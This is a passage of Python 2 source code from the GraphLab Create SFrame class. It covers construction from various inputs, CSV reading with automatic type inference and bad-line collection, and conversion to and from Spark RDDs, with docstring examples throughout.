{'id': 3, 'val': 'C'}
>>> sf[5]
IndexError: SFrame index out of range
Negative indices can be used to access elements from the tail of the array
>>> sf[-1] # returns the last element
{'id': 3, 'val': 'C'}
>>> sf[-2] # returns the second to last element
{'id': 2, 'val': 'B'}
The SFrame also supports the full range of python slicing operators:
>>> sf[1000:] # Returns an SFrame containing rows 1000 to the end
>>> sf[:1000] # Returns an SFrame containing rows 0 to row 999 inclusive
>>> sf[0:1000:2] # Returns an SFrame containing rows 0 to row 1000 in steps of 2
>>> sf[-100:] # Returns an SFrame containing last 100 rows
>>> sf[-100:len(sf):2] # Returns an SFrame containing last 100 rows in steps of 2
**Logical Filter**
An SFrame can be filtered using
>>> sframe[binary_filter]
where sframe is an SFrame and binary_filter is an SArray of the same length.
The result is a new SFrame which contains only rows of the SFrame where its
matching row in the binary_filter is non zero.
This permits the use of boolean operators that can be used to perform
logical filtering operations. For instance, given an SFrame
>>> sf
Columns:
id int
val str
Rows: 3
Data:
id val
0 1 A
1 2 B
2 3 C
>>> sf[(sf['id'] >= 1) & (sf['id'] <= 2)]
Columns:
id int
val str
Rows: 3
Data:
id val
0 1 A
1 2 B
See :class:`~graphlab.SArray` for more details on the use of the logical
filter.
This can also be used more generally to provide filtering capability which
is otherwise not expressible with simple boolean functions. For instance:
>>> sf[sf['id'].apply(lambda x: math.log(x) <= 1)]
Columns:
id int
val str
Rows: 3
Data:
id val
0 1 A
1 2 B
Or alternatively:
>>> sf[sf.apply(lambda x: math.log(x['id']) <= 1)]
Create an SFrame from a Python dictionary.
>>> from graphlab import SFrame
>>> sf = SFrame({'id':[1,2,3], 'val':['A','B','C']})
>>> sf
Columns:
id int
val str
Rows: 3
Data:
id val
0 1 A
1 2 B
2 3 C
"""
__slots__ = ['shape', '__proxy__', '_proxy']
def __init__(self, data=None,
format='auto',
_proxy=None):
"""__init__(data=list(), format='auto')
Construct a new SFrame from a url or a pandas.DataFrame.
"""
# emit metrics for num_rows, num_columns, and type (local://, s3, hdfs, http)
tracker = _mt._get_metric_tracker()
if (_proxy):
self.__proxy__ = _proxy
else:
self.__proxy__ = UnitySFrameProxy(glconnect.get_client())
_format = None
if (format == 'auto'):
if (HAS_PANDAS and isinstance(data, pandas.DataFrame)):
_format = 'dataframe'
tracker.track('sframe.location.memory', value=1)
elif (isinstance(data, str) or isinstance(data, unicode)):
if data.find('://') == -1:
suffix = 'local'
else:
suffix = data.split('://')[0]
tracker.track(('sframe.location.%s' % (suffix)), value=1)
if data.endswith(('.csv', '.csv.gz')):
_format = 'csv'
elif data.endswith(('.tsv', '.tsv.gz')):
_format = 'tsv'
elif data.endswith(('.txt', '.txt.gz')):
print "Assuming file is csv. For other delimiters, " + \
"please use `SFrame.read_csv`."
_format = 'csv'
else:
_format = 'sframe'
elif type(data) == SArray:
_format = 'sarray'
elif isinstance(data, SFrame):
_format = 'sframe_obj'
elif (hasattr(data, 'iteritems')):
_format = 'dict'
tracker.track('sframe.location.memory', value=1)
elif hasattr(data, '__iter__'):
_format = 'array'
tracker.track('sframe.location.memory', value=1)
elif data is None:
_format = 'empty'
else:
raise ValueError('Cannot infer input type for data ' + str(data))
else:
_format = format
tracker.track(('sframe.format.%s' % _format), value=1)
with cython_context():
if (_format == 'dataframe'):
self.__proxy__.load_from_dataframe(data)
elif (_format == 'sframe_obj'):
for col in data.column_names():
self.__proxy__.add_column(data[col].__proxy__, col)
elif (_format == 'sarray'):
self.__proxy__.add_column(data.__proxy__, "")
elif (_format == 'array'):
if len(data) > 0:
unique_types = set([type(x) for x in data if x is not None])
if len(unique_types) == 1 and SArray in unique_types:
for arr in data:
self.add_column(arr)
elif SArray in unique_types:
raise ValueError("Cannot create SFrame from mix of regular values and SArrays")
else:
self.__proxy__.add_column(SArray(data).__proxy__, "")
elif (_format == 'dict'):
for key,val in iter(sorted(data.iteritems())):
if (type(val) == SArray):
self.__proxy__.add_column(val.__proxy__, key)
else:
self.__proxy__.add_column(SArray(val).__proxy__, key)
elif (_format == 'csv'):
url = _make_internal_url(data)
tmpsf = SFrame.read_csv(url, delimiter=',', header=True)
self.__proxy__ = tmpsf.__proxy__
elif (_format == 'tsv'):
url = _make_internal_url(data)
tmpsf = SFrame.read_csv(url, delimiter='\t', header=True)
self.__proxy__ = tmpsf.__proxy__
elif (_format == 'sframe'):
url = _make_internal_url(data)
self.__proxy__.load_from_sframe_index(url)
elif (_format == 'empty'):
pass
else:
raise ValueError('Unknown input type: ' + format)
sframe_size = -1
if self.__has_size__():
sframe_size = self.num_rows()
tracker.track('sframe.row.size', value=sframe_size)
tracker.track('sframe.col.size', value=self.num_cols())
@staticmethod
def _infer_column_types_from_lines(first_rows):
if (len(first_rows.column_names()) < 1):
print "Insufficient number of columns to perform type inference"
raise RuntimeError("Insufficient columns ")
if len(first_rows) < 1:
print "Insufficient number of rows to perform type inference"
raise RuntimeError("Insufficient rows")
# gets all the values column-wise
all_column_values_transposed = [list(first_rows[col])
for col in first_rows.column_names()]
# transpose
all_column_values = [list(x) for x in zip(*all_column_values_transposed)]
all_column_type_hints = [[type(t) for t in vals] for vals in all_column_values]
# collect the hints
# if every line was inferred to have a different number of elements, die
if len(set(len(x) for x in all_column_type_hints)) != 1:
print "Unable to infer column types. Defaulting to str"
return str
import types
column_type_hints = all_column_type_hints[0]
# now perform type combining across rows
for i in range(1, len(all_column_type_hints)):
currow = all_column_type_hints[i]
for j in range(len(column_type_hints)):
# combine types
d = set([currow[j], column_type_hints[j]])
if (len(d) == 1):
# easy case. both agree on the type
continue
if ((int in d) and (float in d)):
# one is an int, one is a float. its a float
column_type_hints[j] = float
elif ((array.array in d) and (list in d)):
# one is an array , one is a list. its a list
column_type_hints[j] = list
elif types.NoneType in d:
# one is a NoneType. assign to other type
if currow[j] != types.NoneType:
column_type_hints[j] = currow[j]
else:
column_type_hints[j] = str
# final pass. everything whih is still NoneType is now a str
for i in range(len(column_type_hints)):
if column_type_hints[i] == types.NoneType:
column_type_hints[i] = str
return column_type_hints
@classmethod
def _read_csv_impl(cls,
url,
delimiter=',',
header=True,
error_bad_lines=False,
comment_char='',
escape_char='\\',
double_quote=True,
quote_char='\"',
skip_initial_space=True,
column_type_hints=None,
na_values=["NA"],
nrows=None,
verbose=True,
store_errors=True):
"""
Constructs an SFrame from a CSV file or a path to multiple CSVs, and
returns a pair containing the SFrame and optionally
(if store_errors=True) a dict of filenames to SArrays
indicating for each file, what are the incorrectly parsed lines
encountered.
Parameters
----------
store_errors : bool
If true, the output errors dict will be filled.
See `read_csv` for the rest of the parameters.
"""
parsing_config = dict()
parsing_config["delimiter"] = delimiter
parsing_config["use_header"] = header
parsing_config["continue_on_failure"] = not error_bad_lines
parsing_config["comment_char"] = comment_char
parsing_config["escape_char"] = escape_char
parsing_config["double_quote"] = double_quote
parsing_config["quote_char"] = quote_char
parsing_config["skip_initial_space"] = skip_initial_space
parsing_config["store_errors"] = store_errors
if type(na_values) is str:
na_values = [na_values]
if na_values is not None and len(na_values) > 0:
parsing_config["na_values"] = na_values
if nrows != None:
parsing_config["row_limit"] = nrows
proxy = UnitySFrameProxy(glconnect.get_client())
internal_url = _make_internal_url(url)
if (not verbose):
glconnect.get_client().set_log_progress(False)
# Attempt to automatically detect the column types. Either produce a
# list of types; otherwise default to all str types.
column_type_inference_was_used = False
if column_type_hints is None:
try:
# Get the first 100 rows (using all the desired arguments).
first_rows = graphlab.SFrame.read_csv(url, nrows=100,
column_type_hints=type(None),
header=header,
delimiter=delimiter,
comment_char=comment_char,
escape_char=escape_char,
double_quote=double_quote,
quote_char=quote_char,
skip_initial_space=skip_initial_space,
na_values = na_values)
column_type_hints = SFrame._infer_column_types_from_lines(first_rows)
typelist = '[' + ','.join(t.__name__ for t in column_type_hints) + ']'
print "------------------------------------------------------"
print "Inferred types from first line of file as "
print "column_type_hints="+ typelist
print "If parsing fails due to incorrect types, you can correct"
print "the inferred type list above and pass it to read_csv in"
print "the column_type_hints argument"
print "------------------------------------------------------"
column_type_inference_was_used = True
except Exception as e:
if type(e) == RuntimeError and "CSV parsing cancelled" in e.message:
raise e
# If the above fails, default back to str for all columns.
column_type_hints = str
print 'Could not detect types. Using str for each column.'
if type(column_type_hints) is type:
type_hints = {'__all_columns__': column_type_hints}
elif type(column_type_hints) is list:
type_hints = dict(zip(['__X%d__' % i for i in range(len(column_type_hints))], column_type_hints))
elif type(column_type_hints) is dict:
type_hints = column_type_hints
else:
raise TypeError("Invalid type for column_type_hints. Must be a dictionary, list or a single type.")
_mt._get_metric_tracker().track('sframe.csv.parse')
suffix=''
if url.find('://') == -1:
suffix = 'local'
else:
suffix = url.split('://')[0]
_mt._get_metric_tracker().track(('sframe.location.%s' % (suffix)), value=1)
try:
with cython_context():
errors = proxy.load_from_csvs(internal_url, parsing_config, type_hints)
except Exception as e:
if type(e) == RuntimeError and "CSV parsing cancelled" in e.message:
raise e
if column_type_inference_was_used:
# try again
print "Unable to parse the file with automatic type inference."
print "Defaulting to column_type_hints=str"
type_hints = {'__all_columns__': str}
try:
with cython_context():
errors = proxy.load_from_csvs(internal_url, parsing_config, type_hints)
except:
raise
else:
raise
glconnect.get_client().set_log_progress(True)
return (cls(_proxy=proxy), { f: SArray(_proxy = es) for (f, es) in errors.iteritems() })
@classmethod
def read_csv_with_errors(cls,
url,
delimiter=',',
header=True,
comment_char='',
escape_char='\\',
double_quote=True,
quote_char='\"',
skip_initial_space=True,
column_type_hints=None,
na_values=["NA"],
nrows=None,
verbose=True):
"""
Constructs an SFrame from a CSV file or a path to multiple CSVs, and
returns a pair containing the SFrame and a dict of filenames to SArrays
indicating for each file, what are the incorrectly parsed lines
encountered.
Parameters
----------
url : string
Location of the CSV file or directory to load. If URL is a directory
or a "glob" pattern, all matching files will be loaded.
delimiter : string, optional
This describes the delimiter used for parsing csv files.
header : bool, optional
If true, uses the first row as the column names. Otherwise use the
default column names: 'X1, X2, ...'.
comment_char : string, optional
The character which denotes that the
remainder of the line is a comment.
escape_char : string, optional
Character which begins a C escape sequence
double_quote : bool, optional
If True, two consecutive quotes in a string are parsed to a single
quote.
quote_char : string, optional
Character sequence that indicates a quote.
skip_initial_space : bool, optional
Ignore extra spaces at the start of a field
column_type_hints : None, type, list[type], dict[string, type], optional
This provides type hints for each column. By default, this method
attempts to detect the type of each column automatically.
Supported types are int, float, str, list, dict, and array.array.
* If a single type is provided, the type will be
applied to all columns. For instance, column_type_hints=float
will force all columns to be parsed as float.
* If a list of types is provided, the types applies
to each column in order, e.g.[int, float, str]
will parse the first column as int, second as float and third as
string.
* If a dictionary of column name to type is provided,
each type value in the dictionary is applied to the key it
belongs to.
For instance {'user':int} will hint that the column called "user"
should be parsed as an integer, and the rest will default to
string.
na_values : str | list of str, optional
A string or list of strings to be interpreted as missing values.
nrows : int, optional
If set, only this many rows will be read from the file.
verbose : bool, optional
If True, print the progress.
Returns
-------
out : tuple
The first element is the SFrame with good data. The second element
is a dictionary of filenames to SArrays indicating for each file,
what are the incorrectly parsed lines encountered.
See Also
--------
read_csv, SFrame
Examples
--------
>>> bad_url = 'https://s3.amazonaws.com/gl-testdata/bad_csv_example.csv'
>>> (sf, bad_lines) = graphlab.SFrame.read_csv_with_errors(bad_url)
>>> sf
+---------+----------+--------+
| user_id | movie_id | rating |
+---------+----------+--------+
| 25904 | 1663 | 3 |
| 25907 | 1663 | 3 |
| 25923 | 1663 | 3 |
| 25924 | 1663 | 3 |
| 25928 | 1663 | 2 |
| ... | ... | ... |
+---------+----------+--------+
[98 rows x 3 columns]
>>> bad_lines
{'https://s3.amazonaws.com/gl-testdata/bad_csv_example.csv': dtype: str
Rows: 1
['x,y,z,a,b,c']}
"""
return cls._read_csv_impl(url,
delimiter=delimiter,
header=header,
error_bad_lines=False, # we are storing errors,
# thus we must not fail
# on bad lines
comment_char=comment_char,
escape_char=escape_char,
double_quote=double_quote,
quote_char=quote_char,
skip_initial_space=skip_initial_space,
column_type_hints=column_type_hints,
na_values=na_values,
nrows=nrows,
verbose=verbose,
store_errors=True)
@classmethod
def read_csv(cls,
url,
delimiter=',',
header=True,
error_bad_lines=False,
comment_char='',
escape_char='\\',
double_quote=True,
quote_char='\"',
skip_initial_space=True,
column_type_hints=None,
na_values=["NA"],
nrows=None,
verbose=True):
"""
Constructs an SFrame from a CSV file or a path to multiple CSVs.
Parameters
----------
url : string
Location of the CSV file or directory to load. If URL is a directory
or a "glob" pattern, all matching files will be loaded.
delimiter : string, optional
This describes the delimiter used for parsing csv files.
header : bool, optional
If true, uses the first row as the column names. Otherwise use the
default column names : 'X1, X2, ...'.
error_bad_lines : bool
If true, will fail upon encountering a bad line. If false, will
continue parsing skipping lines which fail to parse correctly.
A sample of the first 10 encountered bad lines will be printed.
comment_char : string, optional
The character which denotes that the remainder of the line is a
comment.
escape_char : string, optional
Character which begins a C escape sequence
double_quote : bool, optional
If True, two consecutive quotes in a string are parsed to a single
quote.
quote_char : string, optional
Character sequence that indicates a quote.
skip_initial_space : bool, optional
Ignore extra spaces at the start of a field
column_type_hints : None, type, list[type], dict[string, type], optional
This provides type hints for each column. By default, this method
attempts to detect the type of each column automatically.
Supported types are int, float, str, list, dict, and array.array.
* If a single type is provided, the type will be
applied to all columns. For instance, column_type_hints=float
will force all columns to be parsed as float.
* If a list of types is provided, the types applies
to each column in order, e.g.[int, float, str]
will parse the first column as int, second as float and third as
string.
* If a dictionary of column name to type is provided,
each type value in the dictionary is applied to the key it
belongs to.
For instance {'user':int} will hint that the column called "user"
should be parsed as an integer, and the rest will default to
string.
na_values : str | list of str, optional
A string or list of strings to be interpreted as missing values.
nrows : int, optional
If set, only this many rows will be read from the file.
verbose : bool, optional
If True, print the progress.
Returns
-------
out : SFrame
See Also
--------
read_csv_with_errors, SFrame
Examples
--------
Read a regular csv file, with all default options, automatically
determine types:
>>> url = 'http://s3.amazonaws.com/gl-testdata/rating_data_example.csv'
>>> sf = graphlab.SFrame.read_csv(url)
>>> sf
Columns:
user_id int
movie_id int
rating int
Rows: 10000
+---------+----------+--------+
| user_id | movie_id | rating |
+---------+----------+--------+
| 25904 | 1663 | 3 |
| 25907 | 1663 | 3 |
| 25923 | 1663 | 3 |
| 25924 | 1663 | 3 |
| 25928 | 1663 | 2 |
| ... | ... | ... |
+---------+----------+--------+
[10000 rows x 3 columns]
Read only the first 100 lines of the csv file:
>>> sf = graphlab.SFrame.read_csv(url, nrows=100)
>>> sf
Columns:
user_id int
movie_id int
rating int
Rows: 100
+---------+----------+--------+
| user_id | movie_id | rating |
+---------+----------+--------+
| 25904 | 1663 | 3 |
| 25907 | 1663 | 3 |
| 25923 | 1663 | 3 |
| 25924 | 1663 | 3 |
| 25928 | 1663 | 2 |
| ... | ... | ... |
+---------+----------+--------+
[100 rows x 3 columns]
Read all columns as str type
>>> sf = graphlab.SFrame.read_csv(url, column_type_hints=str)
>>> sf
Columns:
user_id str
movie_id str
rating str
Rows: 10000
+---------+----------+--------+
| user_id | movie_id | rating |
+---------+----------+--------+
| 25904 | 1663 | 3 |
| 25907 | 1663 | 3 |
| 25923 | 1663 | 3 |
| 25924 | 1663 | 3 |
| 25928 | 1663 | 2 |
| ... | ... | ... |
+---------+----------+--------+
[10000 rows x 3 columns]
Specify types for a subset of columns and leave the rest to be str.
>>> sf = graphlab.SFrame.read_csv(url,
... column_type_hints={
... 'user_id':int, 'rating':float
... })
>>> sf
Columns:
user_id str
movie_id str
rating float
Rows: 10000
+---------+----------+--------+
| user_id | movie_id | rating |
+---------+----------+--------+
| 25904 | 1663 | 3.0 |
| 25907 | 1663 | 3.0 |
| 25923 | 1663 | 3.0 |
| 25924 | 1663 | 3.0 |
| 25928 | 1663 | 2.0 |
| ... | ... | ... |
+---------+----------+--------+
[10000 rows x 3 columns]
Not treat first line as header:
>>> sf = graphlab.SFrame.read_csv(url, header=False)
>>> sf
Columns:
X1 str
X2 str
X3 str
Rows: 10001
+---------+----------+--------+
| X1 | X2 | X3 |
+---------+----------+--------+
| user_id | movie_id | rating |
| 25904 | 1663 | 3 |
| 25907 | 1663 | 3 |
| 25923 | 1663 | 3 |
| 25924 | 1663 | 3 |
| 25928 | 1663 | 2 |
| ... | ... | ... |
+---------+----------+--------+
[10001 rows x 3 columns]
Treat '3' as missing value:
>>> sf = graphlab.SFrame.read_csv(url, na_values=['3'], column_type_hints=str)
>>> sf
Columns:
user_id str
movie_id str
rating str
Rows: 10000
+---------+----------+--------+
| user_id | movie_id | rating |
+---------+----------+--------+
| 25904 | 1663 | None |
| 25907 | 1663 | None |
| 25923 | 1663 | None |
| 25924 | 1663 | None |
| 25928 | 1663 | 2 |
| ... | ... | ... |
+---------+----------+--------+
[10000 rows x 3 columns]
Throw error on parse failure:
>>> bad_url = 'https://s3.amazonaws.com/gl-testdata/bad_csv_example.csv'
>>> sf = graphlab.SFrame.read_csv(bad_url, error_bad_lines=True)
RuntimeError: Runtime Exception. Unable to parse line "x,y,z,a,b,c"
Set error_bad_lines=False to skip bad lines
"""
return cls._read_csv_impl(url,
delimiter=delimiter,
header=header,
error_bad_lines=error_bad_lines,
comment_char=comment_char,
escape_char=escape_char,
double_quote=double_quote,
quote_char=quote_char,
skip_initial_space=skip_initial_space,
column_type_hints=column_type_hints,
na_values=na_values,
nrows=nrows,
verbose=verbose,
store_errors=False)[0]
def to_schema_rdd(self,sc,sql,number_of_partitions=4):
"""
Convert the current SFrame to the Spark SchemaRDD.
To enable this function, you must add the jar file bundled with GraphLab
Create to the Spark driver's classpath. This must happen BEFORE Spark
launches its JVM, or else it will have no effect. To do this, first get
the location of the packaged jar with
`graphlab.get_spark_integration_jar_path`. You then have two options:
1. Add the path to the jar to your spark-defaults.conf file. The
property to set is 'spark.driver.extraClassPath'.
OR
2. Add the jar's path as a command line option to your favorite way to
start pyspark (either spark-submit or pyspark). For this, use the
command line option '--driver-class-path'.
Parameters
----------
sc : SparkContext
sc is an existing SparkContext.
sql : SQLContext
sql is an existing SQLContext.
number_of_partitions : int
number of partitions for the output rdd
Returns
----------
out: SchemaRDD
Examples
--------
>>> from pyspark import SparkContext, SQLContext
>>> from graphlab import SFrame
>>> sc = SparkContext('local')
>>> sqlc = SQLContext(sc)
>>> sf = SFrame({'x': [1,2,3], 'y': ['fish', 'chips', 'salad']})
>>> rdd = sf.to_schema_rdd(sc, sqlc)
>>> rdd.collect()
[Row(x=1, y=u'fish'), Row(x=2, y=u'chips'), Row(x=3, y=u'salad')]
"""
def homogeneous_type(seq):
if seq is None or len(seq) == 0:
return True
iseq = iter(seq)
first_type = type(next(iseq))
return True if all( (type(x) is first_type) for x in iseq ) else False
if len(self) == 0:
raise ValueError("SFrame is empty")
column_names = self.column_names()
first_row = self.head(1)[0]
for name in column_names:
if hasattr(first_row[name],'__iter__') and homogeneous_type(first_row[name]) is not True:
raise TypeError("Support for translation to Spark SchemaRDD not enabled for heterogeneous iterable type (column: %s). Use SFrame.to_rdd()." % name)
for _type in self.column_types():
if(_type.__name__ == 'datetime'):
raise TypeError("Support for translation to Spark SchemaRDD not enabled for datetime type. Use SFrame.to_rdd() ")
rdd = self.to_rdd(sc,number_of_partitions);
from pyspark.sql import Row
rowRdd = rdd.map(lambda x: Row(**x))
return sql.inferSchema(rowRdd)
def to_rdd(self, sc, number_of_partitions=4):
"""
Convert the current SFrame to the Spark RDD.
To enable this function, you must add the jar file bundled with GraphLab
Create to the Spark driver's classpath. This must happen BEFORE Spark
launches its JVM, or else it will have no effect. To do this, first get
the location of the packaged jar with
`graphlab.get_spark_integration_jar_path`. You then have two options:
1. Add the path to the jar to your spark-defaults.conf file. The
property to set is 'spark.driver.extraClassPath'.
OR
2. Add the jar's path as a command line option to your favorite way to
start pyspark (either spark-submit or pyspark). For this, use the
command line option '--driver-class-path'.
Parameters
----------
sc : SparkContext
sc is an existing SparkContext.
number_of_partitions: int
number of partitions for the output rdd
Returns
----------
out: RDD
Examples
--------
>>> from pyspark import SparkContext
>>> from graphlab import SFrame
>>> sc = SparkContext('local')
>>> sf = SFrame({'x': [1,2,3], 'y': ['fish', 'chips', 'salad']})
>>> rdd = sf.to_rdd(sc)
>>> rdd.collect()
[{'x': 1L, 'y': 'fish'}, {'x': 2L, 'y': 'chips'}, {'x': 3L, 'y': 'salad'}]
"""
_mt._get_metric_tracker().track('sframe.to_rdd')
if not RDD_SUPPORT:
raise Exception("Support for translation to Spark RDDs not enabled.")
for _type in self.column_types():
if(_type.__name__ == 'Image'):
raise TypeError("Support for translation to Spark RDDs not enabled for Image type.")
if type(number_of_partitions) is not int:
raise ValueError("number_of_partitions parameter expects an integer type")
if number_of_partitions == 0:
raise ValueError("number_of_partitions can not be initialized to zero")
# Save SFrame in a temporary place
tmp_loc = self.__get_staging_dir__(sc)
sf_loc = os.path.join(tmp_loc, str(uuid.uuid4()))
self.save(sf_loc)
# Keep track of the temporary sframe that is saved(). We need to delete it eventually.
dummysf = load_sframe(sf_loc)
dummysf.__proxy__.delete_on_close()
SFRAME_GARBAGE_COLLECTOR.append(dummysf)
sframe_len = self.__len__()
small_partition_size = sframe_len/number_of_partitions
big_partition_size = small_partition_size + 1
num_big_partition_size = sframe_len % number_of_partitions
num_small_partition_size = number_of_partitions - num_big_partition_size
count = 0
start_index = 0
ranges = []
while(count < number_of_partitions):
if(count < num_big_partition_size):
ranges.append((str(start_index)+":"+str(start_index + big_partition_size)))
start_index = start_index + big_partition_size
else:
ranges.append((str(start_index)+":"+str(start_index + small_partition_size)))
start_index = start_index + small_partition_size
count+=1
from pyspark import RDD
rdd = sc.parallelize(ranges,number_of_partitions)
if sc.master[0:5] == 'local':
pipeRdd = sc._jvm.org.graphlab.create.GraphLabUtil.pythonToJava(
rdd._jrdd).pipe(
BINARY_PATHS['SPARK_PIPE_WRAPPER_PATH'] + \
" " + BINARY_PATHS['SFRAME_RDD_PATH'] + " " + sf_loc)
elif sc.master == 'yarn-client':
pipeRdd = sc._jvm.org.graphlab.create.GraphLabUtil.pythonToJava(
rdd._jrdd).pipe(
"./" + SPARK_SUPPORT_NAMES['SPARK_PIPE_WRAPPER_PATH'] + \
" " + "./" + SPARK_SUPPORT_NAMES['SFRAME_RDD_PATH'] + \
" " + sf_loc)
serializedRdd = sc._jvm.org.graphlab.create.GraphLabUtil.stringToByte(pipeRdd)
import pyspark
output_rdd = RDD(serializedRdd,sc,pyspark.serializers.PickleSerializer())
return output_rdd
@classmethod
def __get_staging_dir__(cls,cur_sc):
if not RDD_SUPPORT_INITED:
__rdd_support_init__(cur_sc)
return STAGING_DIR
@classmethod
def from_rdd(cls, rdd):
"""
Convert a Spark RDD into a GraphLab Create SFrame.
To enable this function, you must add the jar file bundled with GraphLab
Create to the Spark driver's classpath. This must happen BEFORE Spark
launches its JVM, or else it will have no effect. To do this, first get
the location of the packaged jar with
`graphlab.get_spark_integration_jar_path`. You then have two options:
1. Add the path to the jar to your spark-defaults.conf file. The
property to set is 'spark.driver.extraClassPath'.
OR
2. Add the jar's path as a command line option to your favorite way to
start pyspark (either spark-submit or pyspark). For this, use the
command line option '--driver-class-path'.
Parameters
----------
rdd : pyspark.rdd.RDD
Returns
-------
out : SFrame
Examples
--------
>>> from pyspark import SparkContext
>>> from graphlab import SFrame
>>> sc = SparkContext('local')
>>> rdd = sc.parallelize([1,2,3])
>>> sf = SFrame.from_rdd(rdd)
>>> sf
Data:
+-----+
| X1 |
+-----+
| 1.0 |
| 2.0 |
| 3.0 |
+-----+
[3 rows x 1 columns]
"""
_mt._get_metric_tracker().track('sframe.from_rdd')
if not RDD_SUPPORT:
raise Exception("Support for translation to Spark RDDs not enabled.")
checkRes = rdd.take(1);
if len(checkRes) > 0 and checkRes[0].__class__.__name__ == 'Row' and rdd.__class__.__name__ not in {'SchemaRDD','DataFrame'}:
raise Exception("Conversion from RDD(pyspark.sql.Row) to SFrame not supported. Please call inferSchema(RDD) first.")
if(rdd._jrdd_deserializer.__class__.__name__ == 'UTF8Deserializer'):
return SFrame.__from_UTF8Deserialized_rdd__(rdd)
sf_names = None
rdd_type = "rdd"
if rdd.__class__.__name__ in {'SchemaRDD','DataFrame'}:
rdd_type = "schemardd"
first_row = rdd.take(1)[0]
if hasattr(first_row, 'keys'):
sf_names = first_row.keys()
else:
sf_names = first_row.__FIELDS__
sf_names = [str(i) for i in sf_names]
cur_sc = rdd.ctx
tmp_loc = SFrame.__get_staging_dir__(cur_sc)
if tmp_loc is None:
raise RuntimeError("Could not determine staging directory for SFrame files.")
mode = "batch"
if(rdd._jrdd_deserializer.__class__.__name__ == 'PickleSerializer'):
mode = "pickle"
if cur_sc.master[0:5] == 'local':
t = cur_sc._jvm.org.graphlab.create.GraphLabUtil.byteToString(
rdd._jrdd).pipe(
BINARY_PATHS['SPARK_PIPE_WRAPPER_PATH'] + " " + \
BINARY_PATHS['RDD_SFRAME_PATH'] + " " + tmp_loc +\
" " + mode + " " + rdd_type)
else:
t = cur_sc._jvm.org.graphlab.create.GraphLabUtil.byteToString(
rdd._jrdd).pipe(
"./" + SPARK_SUPPORT_NAMES['SPARK_PIPE_WRAPPER_PATH'] +\
" " + "./" + SPARK_SUPPORT_NAMES['RDD_SFRAME_PATH'] + " " +\
tmp_loc + " " + mode + " " + rdd_type)
# We get the location of an SFrame index file per Spark partition in
# the result. We assume that this is in partition order.
res = t.collect()
out_sf = cls()
sframe_list = []
for url in res:
sf = SFrame()
sf.__proxy__.load_from_sframe_index(_make_internal_url(url))
sf.__proxy__.delete_on_close()
out_sf_coltypes = out_sf.column_types()
if(len(out_sf_coltypes) != 0):
sf_coltypes = sf.column_types()
sf_temp_names = sf.column_names()
out_sf_temp_names = out_sf.column_names()
for i in range(len(sf_coltypes)):
if sf_coltypes[i] != out_sf_coltypes[i]:
print "mismatch for types %s and %s" % (sf_coltypes[i],out_sf_coltypes[i])
sf[sf_temp_names[i]] = sf[sf_temp_names[i]].astype(str)
out_sf[out_sf_temp_names[i]] = out_sf[out_sf_temp_names[i]].astype(str)
out_sf = out_sf.append(sf)
out_sf.__proxy__.delete_on_close()
if sf_names is not None:
out_names = out_sf.column_names()
if(set(out_names) != set(sf_names)):
out_sf = out_sf.rename(dict(zip(out_names, sf_names)))
return out_sf
@classmethod
def __from_UTF8Deserialized_rdd__(cls, rdd):
_mt._get_metric_tracker().track('sframe.__from_UTF8Deserialized_rdd__')
if not RDD_SUPPORT:
raise Exception("Support for translation to Spark RDDs not enabled.")
cur_sc = rdd.ctx
sf_names = None
sf_types = None
tmp_loc = SFrame.__get_staging_dir__(cur_sc)
if tmp_loc is None:
raise RuntimeError("Could not determine staging directory for SFrame files.")
if(rdd.__class__.__name__ in {'SchemaRDD','DataFrame'}):
first_row = rdd.take(1)[0]
if hasattr(first_row, 'keys'):
sf_names = first_row.keys()
sf_types = [type(i) for i in first_row.values()]
else:
sf_names = first_row.__FIELDS__
sf_types = [type(i) for i in first_row]
sf_names = [str(i) for i in sf_names]
for _type in sf_types:
if(_type != int and _type != str and _type != float and _type != unicode):
raise TypeError("Only int, str, and float are supported for now")
types = ""
for i in sf_types:
types += i.__name__ + ","
if cur_sc.master[0:5] == 'local':
t = rdd._jschema_rdd.toJavaStringOfValues().pipe(
BINARY_PATHS['SPARK_PIPE_WRAPPER_PATH'] + " " +\
BINARY_PATHS['RDD_SFRAME_NONPICKLE_PATH'] + " " + tmp_loc +\
" " + types)
else:
t = cur_sc._jvm.org.graphlab.create.GraphLabUtil.toJavaStringOfValues(
rdd._jschema_rdd).pipe(
"./" + SPARK_SUPPORT_NAMES['SPARK_PIPE_WRAPPER_PATH'] +\
" " + "./" +\
SPARK_SUPPORT_NAMES['RDD_SFRAME_NONPICKLE_PATH'] + " " +\
tmp_loc + " " + types)
else:
if cur_sc.master[0:5] == 'local':
t = cur_sc._jvm.org.graphlab.create.GraphLabUtil.pythonToJava(
rdd._jrdd).pipe(
BINARY_PATHS['SPARK_PIPE_WRAPPER_PATH'] + " " +\
BINARY_PATHS['RDD_SFRAME_NONPICKLE_PATH'] + " " +\
tmp_loc)
else:
t = cur_sc._jvm.org.graphlab.create.GraphLabUtil.pythonToJava(
rdd._jrdd).pipe(
"./" + SPARK_SUPPORT_NAMES['SPARK_PIPE_WRAPPER_PATH'] +\
" " + "./" +\
SPARK_SUPPORT_NAMES['RDD_SFRAME_NONPICKLE_PATH'] + " " +\
tmp_loc)
# We get the location of an SFrame index file per Spark partition in
# the result. We assume that this is in partition order.
res = t.collect()
out_sf = cls()
sframe_list = []
for url in res:
sf = SFrame()
sf.__proxy__.load_from_sframe_index(_make_internal_url(url))
sf.__proxy__.delete_on_close()
out_sf = out_sf.append(sf)
out_sf.__proxy__.delete_on_close()
if sf_names is not None:
out_names = out_sf.column_names()
if(set(out_names) != set(sf_names)):
out_sf = out_sf.rename(dict(zip(out_names, sf_names)))
return out_sf
@classmethod
def from_odbc(cls, db, sql, verbose=False):
"""
Convert a table or query from a database to an SFrame.
This function does not do any checking on the given SQL query, and
cannot know what effect it will have on the database. Any side effects
from the query will be reflected on the database. If no result
rows are returned, an empty SFrame is created.
Keep in mind the default case your database stores table names in. In
some cases, you may need to add quotation marks (or whatever character
your database uses to quote identifiers), especially if you created the
table using `to_odbc`.
Parameters
----------
db : `graphlab.extensions._odbc_connection.unity_odbc_connection`
An ODBC connection object. This can only be obtained by calling
`graphlab.connect_odbc`. Check that documentation for how to create
this object.
sql : str
A SQL query. The query must be acceptable by the ODBC driver used by
`graphlab.extensions._odbc_connection.unity_odbc_connection`.
Returns
-------
out : SFrame
Notes
-----
This functionality is only supported when using GraphLab Create
entirely on your local machine. Therefore, GraphLab Create's EC2 and
Hadoop execution modes will not be able to use ODBC. Note that this
does not apply to the machine your database is running, which can (and
often will) be running on a separate machine.
Examples
--------
